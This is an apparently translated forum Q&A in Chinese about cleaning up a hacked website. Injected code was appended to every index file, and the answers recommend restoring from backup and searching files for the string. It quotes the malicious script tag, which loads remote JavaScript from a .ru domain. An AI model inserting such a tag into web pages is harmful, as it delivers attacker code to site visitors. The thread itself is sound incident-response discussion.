我进行大部分 Web 开发工作的计算机感染了病毒。我目前正在开发的一个网站被入侵了(我认为是 phpDesigners 存储的 FTP 密码入侵了)。
我目前得到:
<script type="text/javascript" src="http://obscurewax.ru/Queue.js"></script>
<!--[some-random-number-here]-->
位于该域中名称以 index 开头的每个文件的末尾。
目前,我正在梳理服务器上每个名为索引的文件(以及其他随机文件)以查找此更改并将其删除,但这是一个漫长的过程,我不确定这是否是正确的/完整的修复方法。
处理这种情况的最佳方法是什么?
(PC 上的病毒已被清除)
答案1
答案2
与任何受感染的系统一样,最好的办法是清除它并从已知良好的备份中恢复。
答案3
正如 ChrisS 所说,尽可能清除并恢复。如果你对他们入侵的方式判断错误(黑客不会试图入侵单个网站,他们通常会集体入侵),他们会一次又一次地使用相同的方法。Rackspace 托管有一些建议如何处理网站入侵问题。
答案4
大多数文本编辑器(我使用 NotePad++)都会在一组文件中查找字符串。我会尝试将编辑器指向源目录的根目录,然后找到 obsurewax.ru 以查看有多少个文件。